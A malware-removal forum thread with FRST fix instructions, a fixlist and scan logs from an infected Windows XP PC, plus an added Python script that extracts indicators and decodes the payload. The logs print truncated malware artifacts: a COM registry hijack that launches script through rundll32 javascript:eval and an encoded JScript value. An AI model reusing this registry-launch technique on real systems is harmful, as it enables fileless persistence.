Total Virtual: 2047.88 MB
Available Virtual: 1947.06 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:298.05 GB) (Free:266.83 GB) NTFS ==>[Drive with boot components (Windows XP)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: A42D04A3)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=298.1 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#6 aharonov

  • Malware Response Team
  • 2,441 posts
  • Gender:Male

Posted 01 September 2014 - 12:39 PM

Yes, this second computer is infected, too.
Please be careful that you don't interchange my instructions for the two computers. The following steps are for the second computer:


Step 1

Please download the attached file fixlist.txt (5.96 KB) and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


Step 2

Start FRST with administrator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.
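
What this fix is aimed at, as an added illustration that is not part of the thread and not FRST's own code: the Addition.txt above shows repeated DCOM event 10010 timeouts for the server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}, and the FRST entries pasted in the next reply show that the LocalServer32 of a CLSID ending in the same 99B7938DA9E4 has been replaced with rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("...") , that is, script launched straight out of the registry with no file on disk to scan, plus a second value beginning with #@~^, the header that Microsoft's Script Encoder puts in front of JScript.Encode output. The quoted eval() argument is the real script with every character shifted up by one (epdvnfou/xsjuf is document.write). The fixlist's first line, CMD: taskkill /f /t /im dllhost.exe, deals with the symptom the thread is about; the registry lines remove the launcher. The Python below pulls those indicators out of FRST-style lines, correlates hijacked CLSIDs with the DCOM timeouts, decodes the visible payload prefix, and also counts the two other patterns visible in the same fixlist (S1 drivers with eight random lowercase letters whose file is missing, and the At*.job tasks). The sample lines are copied from the logs in this thread; the function names, regular expressions and heuristics are this example's own.

```python
"""Triage helper for the FRST / Addition.txt lines quoted in this thread.

Added example, not part of the original posts and not part of FRST. The
sample lines are copied from the logs pasted in this thread; the function
names and the heuristics are this example's own.
"""
import re

# Copied from the logs in this thread: Addition.txt (DCOM 10010 errors) and
# the fixlist / FRST entries for the second PC. FRST truncates long registry
# values, so the script payload is only a prefix.
SAMPLE_LINES = [
    "Error: (09/01/2014 11:59:14 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)",
    "Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.",
    'HKLM\\...99B7938DA9E4}\\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds',
    "HKLM\\...99B7938DA9E4}\\LocalServer32: [a] #@~^wH4AAA==n{F+2im'xh,)mDk-+or8%mYvEUmDb2ORUtVsJbIStrVc+e'*+*",
    "Winlogon\\Notify\\intelsusb: ntusbw32.dll [X]",
    "S1 aiihtvcz; \\??\\C:\\WINDOWS\\system32\\drivers\\aiihtvcz.sys [X]",
    "S1 ailnikoh; \\??\\C:\\WINDOWS\\system32\\drivers\\ailnikoh.sys [X]",
    "R1 eamon; C:\\WINDOWS\\System32\\DRIVERS\\eamon.sys [161368 2013-01-10] (ESET)",
    "Task: C:\\WINDOWS\\Tasks\\At10.job => ?",
    "Task: C:\\WINDOWS\\Tasks\\At12.job => ?",
]

# A COM LocalServer32 that launches rundll32 with a javascript: URL runs script
# straight out of the registry: there is no malicious file on disk to scan.
HIJACK_RE = re.compile(
    r"([0-9A-F]{12})\}\\LocalServer32:\s*\[[^\]]*\]\s*(rundll32\.exe\s+javascript:.*)", re.I)
# "#@~^" is the header Microsoft's Script Encoder puts in front of JScript.Encode output.
ENCODED_RE = re.compile(r"([0-9A-F]{12})\}\\LocalServer32:\s*\[[^\]]*\]\s*#@~\^", re.I)
# DCOM event 10010: the launched server never registered. It names the full
# CLSID; FRST prints only the last 12 hex digits of the hijacked key, so match on those.
DCOM_RE = re.compile(r"server \{([0-9A-F-]{36})\} did not register with DCOM", re.I)
EVAL_RE = re.compile(r'eval\("([^"]*)')
# Driver services named with eight random lowercase letters whose file is missing ([X]).
RANDOM_DRIVER_RE = re.compile(r"^S1 ([a-z]{8}); .*\\drivers\\\1\.sys \[X\]$")
AT_JOB_RE = re.compile(r"^Task: .*\\Tasks\\At\d+\.job => \?$")


def decode_shift1(payload: str) -> str:
    """Undo the +1 character shift applied to the quoted eval() argument."""
    return "".join(chr(ord(c) - 1) for c in payload)


def triage(lines):
    """Return the indicators found in FRST-style lines, keyed for correlation."""
    hijacks, encoded, dcom = {}, set(), set()
    payloads, drivers, at_jobs = [], [], 0
    for line in lines:
        line = line.rstrip()
        if m := HIJACK_RE.search(line):
            hijacks[m.group(1).upper()] = m.group(2)
            if e := EVAL_RE.search(m.group(2)):
                payloads.append(decode_shift1(e.group(1)))
        if m := ENCODED_RE.search(line):
            encoded.add(m.group(1).upper())
        if m := DCOM_RE.search(line):
            dcom.add(m.group(1)[-12:].upper())  # keep only the suffix FRST prints
        if m := RANDOM_DRIVER_RE.match(line):
            drivers.append(m.group(1))
        if AT_JOB_RE.match(line):
            at_jobs += 1
    return {
        "com_hijacks": hijacks,
        "encoded_script_clsids": encoded,
        "dcom_timeout_clsids": dcom,
        # CLSIDs that are both hijacked and failing to register in DCOM.
        "correlated": set(hijacks) & dcom,
        "decoded_payloads": payloads,
        "random_name_drivers": drivers,
        "at_jobs": at_jobs,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

Run against the two full logs (FRST.txt and Addition.txt concatenated) rather than the sample, the "correlated" set is the quick answer to "which CLSID is behind the DCOM errors", and the decoded prefix tells you at a glance that the value is a script launcher and not a misregistered legitimate server.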


#7 litepc
  • Topic Starter
  • Members
  • 12 posts

Posted 01 September 2014 - 01:19 PM

OK, here are the 2 new files for the 2nd PC.


CMD: taskkill /f /t /im dllhost.exe
Winlogon\Notify\intelsusb: ntusbw32.dll [X]
S2 intelusb3; C:\WINDOWS\system32\inusbw32.dll [X]
C:\WINDOWS\system32\inusbw32.dll
C:\WINDOWS\system32\ntusbw32.dll
HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 220 more characters). <==== ATTENTION!
HKLM\...99B7938DA9E4}\LocalServer32: [a] #@~^wH4AAA==n{F+2im'xh,)mDk-+or8%mYvEUmDb2ORUtVsJbIStrVc+e'*+*    Y.zPhxlc3XwC    NAx\bDKU:xO?DDrUT/ (the data entry has 32372 more characters). <==== ATTENTION!
InvalidSubkeyName: [HKLM\Software\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\******<*>] <===== ATTENTION
Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\WINDOWS\system32\mscoree.dll (Microsoft Corporation)
Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 03 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
S1 aiihtvcz; \??\C:\WINDOWS\system32\drivers\aiihtvcz.sys [X]
S1 ailnikoh; \??\C:\WINDOWS\system32\drivers\ailnikoh.sys [X]
S1 aodyekkc; \??\C:\WINDOWS\system32\drivers\aodyekkc.sys [X]
S1 aqtnxesc; \??\C:\WINDOWS\system32\drivers\aqtnxesc.sys [X]
S1 btrkhckt; \??\C:\WINDOWS\system32\drivers\btrkhckt.sys [X]
S1 cehdbmir; \??\C:\WINDOWS\system32\drivers\cehdbmir.sys [X]
S3 cpuz136; \??\C:\DOCUME~1\LW\LOCALS~1\Temp\cpuz136\cpuz136_x32.sys [X]
S1 crmhksvq; \??\C:\WINDOWS\system32\drivers\crmhksvq.sys [X]
S1 dcphysdl; \??\C:\WINDOWS\system32\drivers\dcphysdl.sys [X]
S1 dctzhdkr; \??\C:\WINDOWS\system32\drivers\dctzhdkr.sys [X]
S1 dhsjwnsa; \??\C:\WINDOWS\system32\drivers\dhsjwnsa.sys [X]
S1 diiedivm; \??\C:\WINDOWS\system32\drivers\diiedivm.sys [X]
S1 dkqlfxtu; \??\C:\WINDOWS\system32\drivers\dkqlfxtu.sys [X]
S1 dywxjbpu; \??\C:\WINDOWS\system32\drivers\dywxjbpu.sys [X]
S1 elanvibc; \??\C:\WINDOWS\system32\drivers\elanvibc.sys [X]
S1 elueucdm; \??\C:\WINDOWS\system32\drivers\elueucdm.sys [X]
S1 emqorjrh; \??\C:\WINDOWS\system32\drivers\emqorjrh.sys [X]
S1 ffwjjktp; \??\C:\WINDOWS\system32\drivers\ffwjjktp.sys [X]
S1 fuwdcpag; \??\C:\WINDOWS\system32\drivers\fuwdcpag.sys [X]
S1 gjqdovsr; \??\C:\WINDOWS\system32\drivers\gjqdovsr.sys [X]
S1 hdzpacyh; \??\C:\WINDOWS\system32\drivers\hdzpacyh.sys [X]
S1 hkjraftu; \??\C:\WINDOWS\system32\drivers\hkjraftu.sys [X]
S1 hkqzjurj; \??\C:\WINDOWS\system32\drivers\hkqzjurj.sys [X]
S1 hudgwneh; \??\C:\WINDOWS\system32\drivers\hudgwneh.sys [X]
S1 hwnaxqhi; \??\C:\WINDOWS\system32\drivers\hwnaxqhi.sys [X]
S1 icjfktdr; \??\C:\WINDOWS\system32\drivers\icjfktdr.sys [X]
S1 ifcaadgw; \??\C:\WINDOWS\system32\drivers\ifcaadgw.sys [X]
S1 iojgrniz; \??\C:\WINDOWS\system32\drivers\iojgrniz.sys [X]
S1 itdfmkmf; \??\C:\WINDOWS\system32\drivers\itdfmkmf.sys [X]
S1 izuejwga; \??\C:\WINDOWS\system32\drivers\izuejwga.sys [X]
S1 jkysozto; \??\C:\WINDOWS\system32\drivers\jkysozto.sys [X]
S1 jneissmq; \??\C:\WINDOWS\system32\drivers\jneissmq.sys [X]
S1 jumggzng; \??\C:\WINDOWS\system32\drivers\jumggzng.sys [X]
S1 kbuuifwp; \??\C:\WINDOWS\system32\drivers\kbuuifwp.sys [X]
S1 krsrhnrw; \??\C:\WINDOWS\system32\drivers\krsrhnrw.sys [X]
S1 lksnxksg; \??\C:\WINDOWS\system32\drivers\lksnxksg.sys [X]
S1 lxnsddjw; \??\C:\WINDOWS\system32\drivers\lxnsddjw.sys [X]
S1 nmarzldd; \??\C:\WINDOWS\system32\drivers\nmarzldd.sys [X]
S1 oyqnomxu; \??\C:\WINDOWS\system32\drivers\oyqnomxu.sys [X]
S1 oznnujzj; \??\C:\WINDOWS\system32\drivers\oznnujzj.sys [X]
S1 pqebwcvo; \??\C:\WINDOWS\system32\drivers\pqebwcvo.sys [X]
S1 pxjpomgz; \??\C:\WINDOWS\system32\drivers\pxjpomgz.sys [X]
S1 qbjxztan; \??\C:\WINDOWS\system32\drivers\qbjxztan.sys [X]
S1 qdqqqeox; \??\C:\WINDOWS\system32\drivers\qdqqqeox.sys [X]
S1 qtiughlc; \??\C:\WINDOWS\system32\drivers\qtiughlc.sys [X]
S1 qvndeefi; \??\C:\WINDOWS\system32\drivers\qvndeefi.sys [X]
S1 rvweqwzh; \??\C:\WINDOWS\system32\drivers\rvweqwzh.sys [X]
S1 rycglvcj; \??\C:\WINDOWS\system32\drivers\rycglvcj.sys [X]
S1 spsewroy; \??\C:\WINDOWS\system32\drivers\spsewroy.sys [X]
S1 tddacvcd; \??\C:\WINDOWS\system32\drivers\tddacvcd.sys [X]
S1 tqolobyj; \??\C:\WINDOWS\system32\drivers\tqolobyj.sys [X]
S1 uxqezgeh; \??\C:\WINDOWS\system32\drivers\uxqezgeh.sys [X]
S1 vdmrhszs; \??\C:\WINDOWS\system32\drivers\vdmrhszs.sys [X]
S1 vxgwctzc; \??\C:\WINDOWS\system32\drivers\vxgwctzc.sys [X]
S1 wlkiibdz; \??\C:\WINDOWS\system32\drivers\wlkiibdz.sys [X]
S1 wnhyorkd; \??\C:\WINDOWS\system32\drivers\wnhyorkd.sys [X]
2014-08-28 19:17 - 2014-08-28 19:47 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SysutilHiggs
2014-08-28 19:16 - 2014-08-28 19:46 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\CottonNoteworthy
2014-08-28 19:15 - 2014-08-28 19:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SupporterRadio
2014-08-28 19:15 - 2014-08-28 19:17 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SupporterHumble
Task: C:\WINDOWS\Tasks\At10.job => ?
Task: C:\WINDOWS\Tasks\At12.job => ?
Task: C:\WINDOWS\Tasks\At14.job => ?
Task: C:\WINDOWS\Tasks\At16.job => ?
Task: C:\WINDOWS\Tasks\At18.job => ?
Task: C:\WINDOWS\Tasks\At2.job => ?
Task: C:\WINDOWS\Tasks\At20.job => ?
Task: C:\WINDOWS\Tasks\At22.job => ?
Task: C:\WINDOWS\Tasks\At24.job => ?
Task: C:\WINDOWS\Tasks\At26.job => ?
Task: C:\WINDOWS\Tasks\At28.job => ?
Task: C:\WINDOWS\Tasks\At30.job => ?
Task: C:\WINDOWS\Tasks\At32.job => ?
Task: C:\WINDOWS\Tasks\At34.job => ?
Task: C:\WINDOWS\Tasks\At36.job => ?
Task: C:\WINDOWS\Tasks\At38.job => ?
Task: C:\WINDOWS\Tasks\At4.job => ?
Task: C:\WINDOWS\Tasks\At40.job => ?
Task: C:\WINDOWS\Tasks\At42.job => ?
Task: C:\WINDOWS\Tasks\At44.job => ?
Task: C:\WINDOWS\Tasks\At46.job => ?
Task: C:\WINDOWS\Tasks\At48.job => ?
Task: C:\WINDOWS\Tasks\At6.job => ?
Task: C:\WINDOWS\Tasks\At8.job => ?
EmptyTemp:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:31-08-2014 02
Ran by LW (administrator) on TravelR on 01-09-2014 14:15:09
Running from C:\Documents and Settings\LW\Desktop\Fr
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 8
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Enigma Software Group USA, LLC.) C:\PROGRA~1\ENIGMA~1\SPYHUN~1\SH4SER~1.EXE
(Amadeus) C:\Program Files\Automatic Update\AutoUpdate.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
(Starfield Technologies) C:\Program Files\Workspace\offSyncService.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2svc.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2comm.exe
(HP) C:\Program Files\HP\HPLaserJetService\HPLaserJetService.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2pre.exe
(Sun Microsystems, Inc.) C:\Program Files\Java\jre6\bin\jqs.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
(Intuit) C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2tray.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\DataProtect\QBIDPService.exe
(Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
(Intel Corporation) C:\WINDOWS\system32\igfxpers.exe
(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
(Intel Corporation) C:\WINDOWS\system32\igfxsrvc.exe
(Intel Corporation) C:\WINDOWS\system32\hkcmd.exe
(Hewlett-Packard Company) C:\Program Files\HP\ToolboxFX\bin\HPTLBXFX.exe
(Analog Devices, Inc.) C:\Program Files\Analog Devices\Core\smax4pnp.exe
() C:\Program Files\HP\Dfawep\bin\hpbdfawep.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuschd2.exe
(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe
(Google Inc.) C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
(Starfield Technologies) C:\Program Files\Workspace\workspaceupdate.exe
(24im LLC) C:\Program Files\24im\24im Messenger\IMC.EXE
(Intuit Inc.) C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_comm_customer.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_system_customer.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_user_customer.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_host.exe
(Microsoft Corporation) C:\WINDOWS\system32\wscntfy.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_user_medium_customer.exe
(Microsoft Corporation) C:\WINDOWS\system32\msfeedssync.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [128232 2009-02-04] (CyberLink Corp.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [ToolboxFX] => C:\Program Files\HP\ToolboxFX\bin\HPTLBXFX.exe [58936 2010-10-25] (Hewlett-Packard Company)
HKLM\...\Run: [SoundMAXPnP] => C:\Program Files\Analog Devices\Core\smax4pnp.exe [1044480 2008-07-15] (Analog Devices, Inc.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\qttask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [Malwarebytes' Anti-Malware] => C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe [449608 2011-08-31] (Malwarebytes Corporation)
HKLM\...\Run: [Intuit SyncManager] => C:\Program Files\Common Files\Intuit\Sync\IntuitSyncManager.exe [2786104 2013-05-31] (Intuit Inc. All rights reserved.)
HKLM\...\Run: [hpbdfawep] => C:\Program Files\HP\Dfawep\bin\hpbdfawep.exe [954368 2007-04-25] ()
HKLM\...\Run: [HP Software Update] => C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM\...\Run: [SpyHunter Security Suite] => C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe [6434176 2014-01-09] (Enigma Software Group USA, LLC.)
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_winlogon.dll (Citrix Online, a division of Citrix Systems, Inc.)
Winlogon\Notify\GoToMyPC: C:\Program Files\Citrix\GoToMyPC\G2WinLogon.dll (Citrix Online, a division of Citrix Systems, Inc.)
HKU\.DEFAULT\...\RunOnce: [FlashPlayerUpdate] => C:\WINDOWS\system32\Macromed\Flash\FlashUtil32_11_9_900_170_ActiveX.exe [839560 2014-01-01] (Adobe Systems Incorporated)
HKU\S-1-5-21-1173838982-2468196426-3268084377-1009\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-05-24] (Google Inc.)
HKU\S-1-5-21-1173838982-2468196426-3268084377-1009\...\Run: [Starfield Updater] => C:\Program Files\Workspace\WorkspaceUpdate.exe [35008 2014-09-01] (Starfield Technologies)
HKU\S-1-5-21-1173838982-2468196426-3268084377-1009\...\Run: [InbitIMC] => C:\Program Files\24im\24im Messenger\IMC.EXE [3423744 2013-07-08] (24im LLC)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Intuit Data Protect.lnk
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files\Intuit\QuickBooks 2012\QBW32.EXE (Intuit Inc.)
ShellIconOverlayIdentifiers: off0 -> {8E33AEC3-C5F2-43C4-B048-9E3EB19B1DD5} => C:\Program Files\Workspace\offsyncext.dll (Starfield Technologies, LLC)
ShellIconOverlayIdentifiers: off1 -> {8E33AEC4-C5F2-43C4-B048-9E3EB19B1DD5} => C:\Program Files\Workspace\offsyncext.dll (Starfield Technologies, LLC)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.live.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/USREL/1
HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://search.msn.com/sphome.aspx
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Google Toolbar Notifier BHO -> {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} -> C:\Program Files\Google\GoogleToolbarNotifier\5.7.9012.1008\swg.dll (Google Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {051FE707-9706-11D5-A836-000102A7C938} http://certificates.amadeusvista.com/sgwadmin/common/AutoUpdateATL26P520.CAB
DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: {3839EEB1-774E-40AC-BB55-1FFF0F09FFBC} http://extranets.us.amadeus.com/techservices/documents/SoftwareDistribution/Amadeus-CS-MIA/AmadeusRailKeyAgent/v1003/install.cab
DPF: {469C92F9-CA8E-4C3E-9AD4-F74EEF097BCA} http://diagnostic.amadeus.com/travelagencies/Cabs/DS_Diagnostic.cab
DPF: {5CCB8990-66EF-4466-B051-CD27FA3821DF} http://content.amadeus.com/Scripts/AmadeusNALibrary/V2.0.0/install.cab
DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1251711551578
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {9D96A8C3-A6DA-47CC-BD44-A968B60C01EB} http://extranet.us.amadeus.com/techservices/documents/softwaredistribution/amadeus-cs-mia/FXG/v1.2.3/MasterPricerFXM.cab
DPF: {B3E32D88-8E7F-468F-B0E2-3A300FD4A82C} http://myitlab.pearsoned.com/Pegasus/Modules/SIMIntegration/Resources/ax/stub.cab
DPF: {C9E2242D-DC05-4C54-9483-A5C90653F7BC} https://techinline.net/Client/TIClient.cab
DPF: {CAFEEFAC-0016-0000-0015-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {DE625294-70E6-45ED-B895-CFFA13AEB044} http://80.179.197.227/activex/AMC.cab
DPF: {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://ncr.webex.com/client/WBXclient-T27L10NSP32EP1-13926/webex/ieatgpc.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: {E90EF4C9-1476-4C49-B926-97C7D9D30A06} http://certificates.amadeusvista.com/certificateinfo/CCCert_Info.CAB
DPF: {F96020DD-C373-44A0-82B6-064EF0AEEAE3} http://certificates.amadeusvista.com/sgwadmin/RegSiteTools.cab
Handler: intu-help-qb2 - {84D77A00-41B5-4b8b-8ADF-86486D72E749} - C:\Program Files\Intuit\QuickBooks 2006\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler: intu-help-qb5 - {867FCB77-9823-4cd6-8210-D85F968D466F} - C:\Program Files\Intuit\QuickBooks 2012\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files\Common Files\Microsoft Shared\Information Retrieval\MSITSS.DLL (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 208.67.222.222 208.67.220.220
Tcpip\..\Interfaces\{03F00D1D-4288-4901-A4C3-F42AA00B1C9A}: [NameServer] 8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1

FireFox:
========
FF ProfilePath: C:\Documents and Settings\LW\Application Data\Mozilla\Firefox\Profiles\acyn7swx.default-1409541858578
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll ()
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Documents and Settings\LW\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Plugin HKCU: @starfield.com/off -> C:\Documents and Settings\LW\Application Data\Mozilla\Plugins\npoff.dll ( Starfield Technologies, LLC.)
FF Plugin HKCU: @starfield.com/wbe -> C:\Documents and Settings\LW\Application Data\Mozilla\Plugins\npwbe.dll (Starfield Technology, LLC)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFFICE.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Documents and Settings\LW\Application Data\mozilla\plugins\npoff.dll ( Starfield Technologies, LLC.)
FF Plugin ProgramFiles/Appdata: C:\Documents and Settings\LW\Application Data\mozilla\plugins\npwbe.dll (Starfield Technology, LLC)
FF Extension: WBE Paste - C:\Documents and Settings\LW\Application Data\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\wbepaste@starfield [2014-09-01]
FF Extension: Firefox Old Version Update Hotfix - C:\Documents and Settings\LW\Application Data\Mozilla\Firefox\Profiles\acyn7swx.default-1409541858578\Extensions\firefox-hotfix@mozilla.org.xpi [2014-08-31]
